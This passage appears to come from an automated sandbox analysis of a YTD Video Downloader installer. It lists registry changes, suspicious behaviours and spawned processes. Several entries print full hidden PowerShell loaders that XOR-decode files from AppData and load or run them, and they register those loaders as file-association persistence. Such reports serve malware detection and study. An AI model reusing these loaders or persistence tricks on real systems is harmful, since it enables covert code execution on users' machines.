$ae101636e6141d9f3ea1c56b4ad19.lEngth;$a803f0f737341687c8250cd617801++){$a49d63ef0c64d6896c7325c0e3b6b[$aeb9eaa86f544fbc9f97163012971]=$a49d63ef0c64d6896c7325c0e3b6b[$aeb9eaa86f544fbc9f97163012971] -bxOr $ae101636e6141d9f3ea1c56b4ad19[$a803f0f737341687c8250cd617801];$aeb9eaa86f544fbc9f97163012971++;IF($aeb9eaa86f544fbc9f97163012971 -Ge $a49d63ef0c64d6896c7325c0e3b6b.cOuNt){$a803f0f737341687c8250cd617801=$ae101636e6141d9f3ea1c56b4ad19.LENGTh}}};[SYsTEm.ReFLecTIoN.AsSeMbLy]::LOad($a49d63ef0c64d6896c7325c0e3b6b);[mArS.deiMos]::inteRaCt()\"" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.gsxsejlcvhqgpinn\ = "zpinfxlegqavb" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.hucwkefhzoegqypibuv\ = "qlbwvenckwghjycymhz" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\xizvrpyqdelnjbqwye\shell C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\gayhiusqkilpcm\shell C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ndhqnowpzdefglqlbh\shell\open\command\ = "PowErshelL -WIndOwStyLE hidDen -EP BypAss -cOmMAND \"$ae101636e6141d9f3ea1c56b4ad19='XjA9VkFeT2xzQ15ORlU3Xk9CJnNAU0JqRUB2eCtiXk9VYHlAeDY8JF5TR2FAQHN5akleUnxuUF5veldfQGBrZ2xAdEthZF5TKyZpXk5POW5eUlNKU15vXn5FXlBzdHlAVW9oZ14wMU1QQHUhUHteTlc8QkB1MFBvQGB8cDdAVHtxbF5SMTxfQHg4ZDReUDBNXkBSWDNaXlFlWkxAYGpTV0B3PlhaXlI9Q3heT21saF5vWD5OQFJXbTw=';$a49d63ef0c64d6896c7325c0e3b6b=[sYStEM.Io.FilE]::reaDALlByTES('C:\\Users\\Admin\\AppData\\Roaming\\mICRoSoFT\\IbPYVgHOnWLRyaw\\ZoGftgDjeOPKqnJb.JSrEXsqNjgTxiDOBGp');FOr($aeb9eaa86f544fbc9f97163012971=0;$aeb9eaa86f544fbc9f97163012971 -Lt $a49d63ef0c64d6896c7325c0e3b6b.COuNT;){fOR($a803f0f737341687c8250cd617801=0;$a803f0f737341687c8250cd617801 -lT $ae101636e6141d9f3ea1c56b4ad19.lEngth;$a803f0f737341687c8250cd617801++){$a49d63ef0c64d6896c7325c0e3b6b[$aeb9eaa86f544fbc9f97163012971]=$a49d63ef0c64d6896c7325c0e3b6b[$aeb9eaa86f544fbc9f97163012971] -bxOr $ae101636e6141d9f3ea1c56b4ad19[$a803f0f737341687c8250cd617801];$aeb9eaa86f544fbc9f97163012971++;IF($aeb9eaa86f544fbc9f97163012971 -Ge $a49d63ef0c64d6896c7325c0e3b6b.cOuNt){$a803f0f737341687c8250cd617801=$ae101636e6141d9f3ea1c56b4ad19.LENGTh}}};[SYsTEm.ReFLecTIoN.AsSeMbLy]::LOad($a49d63ef0c64d6896c7325c0e3b6b);[mArS.deiMos]::inteRaCt()\"" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.ojotbsynykdq\ = "xizvrpyqdelnjbqwye" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ndhqnowpzdefglqlbh C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\qlbwvenckwghjycymhz\shell\open\command\ = "PowErshelL -WIndOwStyLE hidDen -EP BypAss -cOmMAND \"$ae101636e6141d9f3ea1c56b4ad19='XjA9VkFeT2xzQ15ORlU3Xk9CJnNAU0JqRUB2eCtiXk9VYHlAeDY8JF5TR2FAQHN5akleUnxuUF5veldfQGBrZ2xAdEthZF5TKyZpXk5POW5eUlNKU15vXn5FXlBzdHlAVW9oZ14wMU1QQHUhUHteTlc8QkB1MFBvQGB8cDdAVHtxbF5SMTxfQHg4ZDReUDBNXkBSWDNaXlFlWkxAYGpTV0B3PlhaXlI9Q3heT21saF5vWD5OQFJXbTw=';$a49d63ef0c64d6896c7325c0e3b6b=[sYStEM.Io.FilE]::reaDALlByTES('C:\\Users\\Admin\\AppData\\Roaming\\mICRoSoFT\\hbidaOgyoAsjDp\\ISphYfgoRAMcDzEq.dejnAfJxTmhBqi');FOr($aeb9eaa86f544fbc9f97163012971=0;$aeb9eaa86f544fbc9f97163012971 -Lt $a49d63ef0c64d6896c7325c0e3b6b.COuNT;){fOR($a803f0f737341687c8250cd617801=0;$a803f0f737341687c8250cd617801 -lT $ae101636e6141d9f3ea1c56b4ad19.lEngth;$a803f0f737341687c8250cd617801++){$a49d63ef0c64d6896c7325c0e3b6b[$aeb9eaa86f544fbc9f97163012971]=$a49d63ef0c64d6896c7325c0e3b6b[$aeb9eaa86f544fbc9f97163012971] -bxOr $ae101636e6141d9f3ea1c56b4ad19[$a803f0f737341687c8250cd617801];$aeb9eaa86f544fbc9f97163012971++;IF($aeb9eaa86f544fbc9f97163012971 -Ge $a49d63ef0c64d6896c7325c0e3b6b.cOuNt){$a803f0f737341687c8250cd617801=$ae101636e6141d9f3ea1c56b4ad19.LENGTh}}};[SYsTEm.ReFLecTIoN.AsSeMbLy]::LOad($a49d63ef0c64d6896c7325c0e3b6b);[mArS.deiMos]::inteRaCt()\"" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\xizvrpyqdelnjbqwye\shell\open\command\ = "PowErshelL -WIndOwStyLE hidDen -EP BypAss -cOmMAND \"$ae101636e6141d9f3ea1c56b4ad19='XjA9VkFeT2xzQ15ORlU3Xk9CJnNAU0JqRUB2eCtiXk9VYHlAeDY8JF5TR2FAQHN5akleUnxuUF5veldfQGBrZ2xAdEthZF5TKyZpXk5POW5eUlNKU15vXn5FXlBzdHlAVW9oZ14wMU1QQHUhUHteTlc8QkB1MFBvQGB8cDdAVHtxbF5SMTxfQHg4ZDReUDBNXkBSWDNaXlFlWkxAYGpTV0B3PlhaXlI9Q3heT21saF5vWD5OQFJXbTw=';$a49d63ef0c64d6896c7325c0e3b6b=[sYStEM.Io.FilE]::reaDALlByTES('C:\\Users\\Admin\\AppData\\Roaming\\mICRoSoFT\\roKdFIYfCAcWaumehQ\\MIWXbpJrdQylveUVRA.fbsLlnEQdMyHrowq');FOr($aeb9eaa86f544fbc9f97163012971=0;$aeb9eaa86f544fbc9f97163012971 -Lt $a49d63ef0c64d6896c7325c0e3b6b.COuNT;){fOR($a803f0f737341687c8250cd617801=0;$a803f0f737341687c8250cd617801 -lT $ae101636e6141d9f3ea1c56b4ad19.lEngth;$a803f0f737341687c8250cd617801++){$a49d63ef0c64d6896c7325c0e3b6b[$aeb9eaa86f544fbc9f97163012971]=$a49d63ef0c64d6896c7325c0e3b6b[$aeb9eaa86f544fbc9f97163012971] -bxOr $ae101636e6141d9f3ea1c56b4ad19[$a803f0f737341687c8250cd617801];$aeb9eaa86f544fbc9f97163012971++;IF($aeb9eaa86f544fbc9f97163012971 -Ge $a49d63ef0c64d6896c7325c0e3b6b.cOuNt){$a803f0f737341687c8250cd617801=$ae101636e6141d9f3ea1c56b4ad19.LENGTh}}};[SYsTEm.ReFLecTIoN.AsSeMbLy]::LOad($a49d63ef0c64d6896c7325c0e3b6b);[mArS.deiMos]::inteRaCt()\"" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\txlgibmptcbgefnzkow\shell C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\txlgibmptcbgefnzkow\shell\open\command\ = "PowErshelL -WIndOwStyLE hidDen -EP BypAss -cOmMAND \"$ae101636e6141d9f3ea1c56b4ad19='XjA9VkFeT2xzQ15ORlU3Xk9CJnNAU0JqRUB2eCtiXk9VYHlAeDY8JF5TR2FAQHN5akleUnxuUF5veldfQGBrZ2xAdEthZF5TKyZpXk5POW5eUlNKU15vXn5FXlBzdHlAVW9oZ14wMU1QQHUhUHteTlc8QkB1MFBvQGB8cDdAVHtxbF5SMTxfQHg4ZDReUDBNXkBSWDNaXlFlWkxAYGpTV0B3PlhaXlI9Q3heT21saF5vWD5OQFJXbTw=';$a49d63ef0c64d6896c7325c0e3b6b=[sYStEM.Io.FilE]::reaDALlByTES('C:\\Users\\Admin\\AppData\\Roaming\\mICRoSoFT\\PkVdmbAwgriyB\\HVaJBrEtDYZ.jvhroPDqNBXQHsk');FOr($aeb9eaa86f544fbc9f97163012971=0;$aeb9eaa86f544fbc9f97163012971 -Lt $a49d63ef0c64d6896c7325c0e3b6b.COuNT;){fOR($a803f0f737341687c8250cd617801=0;$a803f0f737341687c8250cd617801 -lT $ae101636e6141d9f3ea1c56b4ad19.lEngth;$a803f0f737341687c8250cd617801++){$a49d63ef0c64d6896c7325c0e3b6b[$aeb9eaa86f544fbc9f97163012971]=$a49d63ef0c64d6896c7325c0e3b6b[$aeb9eaa86f544fbc9f97163012971] -bxOr $ae101636e6141d9f3ea1c56b4ad19[$a803f0f737341687c8250cd617801];$aeb9eaa86f544fbc9f97163012971++;IF($aeb9eaa86f544fbc9f97163012971 -Ge $a49d63ef0c64d6896c7325c0e3b6b.cOuNt){$a803f0f737341687c8250cd617801=$ae101636e6141d9f3ea1c56b4ad19.LENGTh}}};[SYsTEm.ReFLecTIoN.AsSeMbLy]::LOad($a49d63ef0c64d6896c7325c0e3b6b);[mArS.deiMos]::inteRaCt()\"" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\xizvrpyqdelnjbqwye\shell\open\command C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ndhqnowpzdefglqlbh\shell\open\command C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\xizvrpyqdelnjbqwye\shell\open C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.fugcczgqfkn\ = "ndhqnowpzdefglqlbh" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\ndhqnowpzdefglqlbh\shell C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\gayhiusqkilpcm\shell\open\command C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.hucwkefhzoegqypibuv C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\txlgibmptcbgefnzkow C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.njekblnzhwlihimv C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\qlbwvenckwghjycymhz\shell\open C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\zpinfxlegqavb\shell\open\command C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\zpinfxlegqavb\shell C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.xrizrwhtdslwpo C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\txlgibmptcbgefnzkow\shell\open\command C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\qlbwvenckwghjycymhz\shell\open\command C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\gayhiusqkilpcm\shell\open C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.xrizrwhtdslwpo\ = "gayhiusqkilpcm" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\zpinfxlegqavb C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\xizvrpyqdelnjbqwye C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.gsxsejlcvhqgpinn C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\gayhiusqkilpcm C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.fugcczgqfkn C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1028 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp
PID 1576 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe
PID 1576 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 3992 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 4868 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4584 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe C:\Windows\explorer.exe
PID 1576 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4584 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe C:\Windows\explorer.exe
PID 2600 wrote to memory of 3028 N/A C:\Windows\explorer.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1200 wrote to memory of 4584 N/A C:\Windows\explorer.exe C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe
PID 3028 wrote to memory of 2184 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3028 wrote to memory of 5784 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe

"C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe"

C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp

"C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp" /SL5="$902C2,116245401,999936,C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe"

C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe

"C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$f7333f90b386ed0b91c1ce090ef9fe1a='C:\Users\Admin\d4c96d281fd0f998028d3d01bfc34319\d83898868d3ea2886e940309afb0d975\add01c2553610a23ebc2f315949f35d4\558732735d58c0d6df02d0db147134e2\b67aff63b5589771446b4ba1056a0a70\a23569a279f49e7862d059e43fd1efa5\1d665c87ae5382646caaac5af0879c63';$6cb8edde4790dfa8fab26a3ddc7628da='hGjHEuNxbBWTCcFKUfkwiRJXdYmsoDvASLnQyeqrVpIgtZOzMPal';$ec033b62faa49304b919b29604a024eb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($f7333f90b386ed0b91c1ce090ef9fe1a));remove-item $f7333f90b386ed0b91c1ce090ef9fe1a;for($i=0;$i -lt $ec033b62faa49304b919b29604a024eb.count;){for($j=0;$j -lt $6cb8edde4790dfa8fab26a3ddc7628da.length;$j++){$ec033b62faa49304b919b29604a024eb[$i]=$ec033b62faa49304b919b29604a024eb[$i] -bxor $6cb8edde4790dfa8fab26a3ddc7628da[$j];$i++;if($i -ge $ec033b62faa49304b919b29604a024eb.count){$j=$6cb8edde4790dfa8fab26a3ddc7628da.length}}};$ec033b62faa49304b919b29604a024eb=[System.Text.Encoding]::UTF8.GetString($ec033b62faa49304b919b29604a024eb);iex $ec033b62faa49304b919b29604a024eb;"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe" "http://www.ytddownloader.com/thankyou.html?isn=CC0F6E83FD38442798C60B854E5A05E8&lang=1033&cid=09d1b505c20534e1a363f3227ff516a5&oldVer=&newVer=5.9.18&kt=ytdd&pv=0"

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Windows\explorer.exe

"C:\Windows\explorer.exe" "C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.ytddownloader.com/thankyou.html?isn=CC0F6E83FD38442798C60B854E5A05E8&lang=1033&cid=09d1b505c20534e1a363f3227ff516a5&oldVer=&newVer=5.9.18&kt=ytdd&pv=0

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe

"C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9eee646f8,0x7ff9eee64708,0x7ff9eee64718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2656 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.ytddownloader.com/premium.html?lngid=1033&lt=f&isn=CC0F6E83FD38442798C60B854E5A05E8&av=5.9.18&ft=4&kt=ytdd

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5128 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5676 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

